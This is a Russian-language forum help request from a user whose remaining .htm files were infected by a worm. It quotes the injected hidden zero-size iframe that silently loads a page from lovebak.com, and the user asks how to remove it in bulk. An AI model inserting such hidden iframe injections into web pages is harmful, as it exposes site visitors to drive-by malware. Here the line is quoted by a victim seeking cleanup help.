Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com
Помогите, пожалуйста, уважаемые форумчане!
Какой-то вирус у меня поудалял многие htm-файлы. Обнаружилось это недавно, но напакостил он, видимо, с месяц назад. То, что никуда не было скопировано (например, на рабочий комп), восстановить, конечно, не удастся, но осталась другая фигня. Те файлы, которые еще остались (их, к счастью, осталось много), при открытии начинают загружать какой-то сайт www.lovebak.com. При прочтении исходного кода любой страницы обнаруживается, что в конце везде стоит следующая строчка:
<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>
У всех измененных файлов одна и та же дата: 29.01.08 (видимо, тогда и были удалены многие файлы)
У меня несколько вопросов:
1. Сталкивался ли кто-нибудь с таким?
2. Вирус, видимо, уже давно удален, поскольку антивирус ничего не находит, но может ли загрузка этого lovebak привести к каким-нибудь проблемам?
3. В любом случае, можно ли как-нибудь удалить вышеприведенную строчку во всех htm-файлах? По одному это придется делать очень долго.
Заранее спасибо.
Последний раз редактировалось drongo; 26.02.2008 в 17:49.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Добавил 3 файла после проверки компьютера. Надеюсь, теперь подскажете, можно ли что-то сделать с htm-файлами. Вообще у меня подозрение, что удалил их сам антивирус (Касперский), который решил, что вылечить их нельзя. (А именно в день, который стоит в дате у всех измененных файлов, я делал проверку и обнаружил червя.) Но что делать с оставшимися, которые постоянно грузят какой-то lovebak.com?
Пофиксил. Добавил в карантин C:\wincmd\WINCMD32.EXE, а autorun.bat не добавляется. AVZ пишет: "Ошибка карантина файла, попытка прямого чтения". Что делать?
В htm-файлах по-прежнему стоит загрузка lovebak.com. В принципе, она не так уж достает, потому что я ее сразу же прерываю. Но все равно можно ли убрать строку загрузки из всех htm-файлов не вручную, по одному?
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: